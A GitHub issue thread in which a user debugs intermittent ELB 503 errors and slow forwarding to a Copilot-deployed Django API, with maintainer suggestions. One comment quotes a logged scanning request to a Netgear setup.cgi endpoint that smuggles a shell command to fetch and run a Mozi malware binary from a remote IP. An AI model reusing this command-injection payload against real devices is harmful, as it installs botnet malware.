### ISSUE TITLE
Weird Issue with ELB not forwarding API requests randomly to Load Balanced Webservice

### ISSUE THREAD

**Issue by aibharata** [aws/copilot-cli#2906]
I have been using a Django application deployed as an API server (Load-balanced Webservice) created with copilot for a few months now. Everything was working fine till a few days ago when I started observing requests being timed out. The weird thing is when I make an API request make from the browser, everything works fine. But when I make it from postman.. it gets timed out (at random times). However, this behavior is not consistent. Sometimes everything works just fine. My team who are developing frontend applications are also facing the same problems. I tried increasing CPU units, memory, scaling. But nothing has resolved this issue. 

On checking svc logs, the request from the postman is not hitting the service at all. However, the logs show ELB checks being successful every 10 seconds.

When I check the AWS dashboard, I see there are ELB 5XX  errors in the graph. But I am unable to find out the reason behind the 5XX errors. The 5XX error seems to be a 503 error. I have gone through all the log groups of the copilot application, can't seem to find any logs of ELB. 

How do I go about debugging the problem? What can be causing this issue?

**Comment by efekarakus** [comment]
Hi @aibharata 👋 

This seems really odd! 🤔 Would you mind testing the following:
- [ ] Copy the same headers from the browser to Postman and test if the requests fail?
- [ ] Can you try making requests with another tool, maybe like `curl`, to see if the issue lies with Postman?

Would you mind sharing with us your `manifest.yml` file as well to see if there is any configuration that sticks out to us? For example like [`allowed_source_ips`](https://aws.github.io/copilot-cli/docs/manifest/lb-web-service/#http-allowed-source-ips) restrictions.  
Another avenue is to investigate is with ALB access logs: https://docs.aws.amazon.com/elasticloadbalancing/latest/application/load-balancer-access-logs.html, unfortunately this would require manual intervention on the load balancer today.

**Comment by aibharata** [comment]
Hi @efekarakus,

Thank you for the suggestions. 
[]  Copy the same headers from the browser to Postman and test if the requests fail? 
      - This failed. Same exact headers from the browser, it still timed out most of the time. Few times it was able to complete successfully.

[x]  Can you try making requests with another tool, maybe like `curl`, to see if the issue lies with Postman?
      - Tried with curl and python-requests, it takes a massive 21226ms+ to fetch just health check API. Seems like postman's request timeout is lower than the current response time.
     
You can see the Manifest.yml here: https://gist.github.com/aibharata/45e510766512bb4fa63ac07d85bf6648

Additionally, I configured the ALB to save access logs to the S3 bucket. There are many requests being sent to IP addresses of ALB scanning for vulnerabilities which causes ALB to return 503 errors.

Here's a sample request coming from suspicious IP 58.248.148.234: 

`GET http://myair-publi-XXXXX-XXXX.ap-south-1.elb.amazonaws.com:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://58.248.148.234:35052/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0`


One thought is maybe the ALB resources are depleted due to these suspicious packets. However, the average is Consumed Load Balancer Capacity Units is just 0.004.  

For now, I added a global accelerator to ALB and it seems to have alleviated the problem a bit in the past 10 mins. Will probably try adding WAF to ALB and see if that fixes the problem. 

But still not able to figure out why requests are taking so long to forward from ALB to service. Our remaining 4 copilot services are also facing the same issue. And this issue only started after last week, when nothing was changed!

**Comment by efekarakus** [comment]
Thanks for the detailed investigation!

That is so odd, we haven't changed anything either in v1.11 for Load Balanced Web Services 🤔 There is nothing unusual in the manifest file that sticks out, it looks good.

Hopefully WAF and global accelerator can help 🤞 
I think you've already done most of these but it might be worthwhile checking again:
- https://aws.amazon.com/premiumsupport/knowledge-center/elb-fix-high-latency-on-alb/
